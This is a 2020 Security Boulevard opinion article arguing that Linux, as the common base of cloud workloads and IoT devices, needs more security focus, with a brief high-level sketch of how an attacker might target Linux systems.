Hot Topics
Cloud Security Cybersecurity Endpoint Industry Spotlight IoT & ICS Security Security Boulevard (Original) 

Why Linux Should Factor Into Your Security Strategy

Avatar photo by Erin Johnson on November 13, 2020

Linux is a pervasive operating system—and for good reason. It’s lightweight, flexible, multi-architecture supportive and open source, all leading to loads of opportunity. Today, Linux-based systems run servers, mainframes, routers, smart cars, cloud workloads and more.

Why Linux

Linux is scalable, modular, reliable and efficient. It offers a backbone for specific implementations that is simple to tailor and adapt.

The cloud and IoT are two technologies that are built almost exclusively on Linux due to these benefits.

Linux is ideal for IoT because there’s no heavy GUI, it can be optimized for hardware-level workloads, and the licensing makes it easy for redistribution. Plus, the extensive open source community may have already created something that suits the needs of a device maker and can be plugged right in.

Many of the same benefits apply when considering Linux for cloud workloads. So logically, as of 2017, Linux was running 90% of public cloud workloads. The benefits—as stated above—allow cloud architects to build anything on top of it while maintaining the inherent benefits of the cloud.

The cloud and IoT markets are seeing significant growth, which will further increase due to the effects of COVID-19. Remote working is likely to become the norm for many companies globally (read: digital transformation and migration to the cloud) and all the time spent at home may likely lead to people buying more smart home devices (read: growth in IoT market).

What, then, is the significance of the cloud and IoT built on Linux, and why should that matter to you or your business?

Threats Facing Linux-based Platforms

Security is one of the main reasons Linux is chosen. In some ways, it can be a more stable and secure base OS to start from, no matter the use case.

But while Linux itself may be more secure than other operating systems, it is not secure. Vulnerabilities are a fact of life for any software or system, whether it’s an actual software vulnerability or an implementation flaw or otherwise.

As further proof of the insecure nature of Linux, we’ve seen increased interest by cybercriminals in attacking Linux over recent months and years.

So, if Linux isn’t all that secure on its own, what about the security of Linux-based platforms?

It is fairly well-known that IoT devices are fallible. Researchers have looked extensively into the security of IoT and IIoT. Across all use cases and device types, connected devices with embedded Linux-based systems provide a viable attack surface for exploitation, and we know criminals are exploring how to monetize IoT attacks.

In the broadest sense, threats to IoT devices can target:

  • The device hardware with embedded Linux-based OS.
  • The connections to a network or third-party system(s).
  • Backend capabilities, both from the IoT provider and third parties.
  • The data collected, processed and stored by the device or backend system.

Each of these four overarching areas can be vulnerable via software bugs, design flaws, implementation errors and user error.

While IoT devices are perceived to be more consumer-facing, cloud computing is used by consumers and businesses of all industries and sizes.

I’ve heard many times that there are no threats to the public cloud, or that “cloud threats” don’t exist. We’ve now seen that proven to be an incorrect assumption. Like Linux, most cloud services are built in a secure manner. But, the best-laid plans … as they say.

The Shared Responsibility Model is paramount when considering cloud security. Shared is the key word here. A Shared model does not mean a transfer of risk; rather, the cloud server provider and the user both have responsibilities for securing the environment and the data within.

Responsibility for securing data in the cloud shifts between user and cloud service provider depending on the type of cloud environment being used, from on-premises to infrastructure as a service (IaaS), to containers, to serverless.

But in the broadest sense, threats that leverage the cloud can target:

  • The cloud service itself, with its Linux-based OS, used for its compute resources.
  • The data being stored, collected or processed by the cloud service.
  • All methods and actors who could add or remove data from the cloud service.
  • Any integrations or connections with other applications or services.

Actual threat modeling for the cloud or IoT is much more in depth and use case-specific. However, I find it helpful to level set all the ways these devices and systems could be at risk, along with all the data processed and stored within them.

Think about the criticality of business data stored in cloud workloads and databases. According to a Forrester study in 2019, businesses are expected to spend $12.6 billion on cloud security tools by 2023 to protect this critical data.

Protect the single common thread that is shared by across mission critical systems and platforms: Linux.

As an industry, we spend so much time protecting an employee’s laptop because an attacker could use the endpoint to traverse the network into critical systems, which are all running Linux.

However, as an attacker, if I were to use a customizable malware targeting Linux, I could infect your cloud workloads, databases, possibly endpoints, mobile devices, connected cameras, etc. Or even simpler, you don’t really need malware for Linux, as the Linux shell gives you nearly everything you’d need from a malware anyway.  A well-written Linux script is as powerful as any malware, and much easier to obfuscate.

If a sophisticated attacker wanted to thoroughly infiltrate a target organization, a potential attack could look like:

  • Use a point of entry to scan the network and find what Linux-based systems are running.
  • Customize a Linux script to integrate with each implementation used by critical systems. This could be done by adjusting the script to target the commands and structure of each or buying actual malware variants for each target.
  • Run the script to infect each system to encrypt and ransom data, or exfiltrate data to sell as PII or for industrial espionage.

With this type of attack, a criminal can simultaneously target and infect all types of critical systems across a corporate environment. A pervasive, laterally moving attack could happen other ways with separate tools for each target by using a shell script slightly modified to infect each system at the OS level.

All of this begs the question: How is there so little focus on protecting Linux-based systems when there’s so much opportunity for attackers?

The cloud and IoT markets will continue to grow. And criminal interest is likely to follow.

With Linux as the common thread, how could we not see an increase in Linux-based malware in the near future?

Erin Johnson , , ,
Avatar photo

Erin Johnson

Erin Johnson has a proven history of successfully translating the complicated world of cybersecurity into succinct, digestible messages for diverse audiences. She relishes the challenge of communicating technical topics to all levels of business leaders and media. Most recently, Erin has bridged the gap between communications and threat research by joining the Trend Micro Research team. As a researcher, she is focused on helping businesses connect the dots between the threat landscape and their IT environment to better understand their risks to effectively prioritize protection. Erin has worked in cybersecurity communications for 6 years with Trend Micro. Prior to joining Trend Micro, she worked for various public relations agencies on major tech brands, including NTT DATA, Samsung Electronics and Texas Instruments.

erin-johnson has 1 posts and counting.See all posts by erin-johnson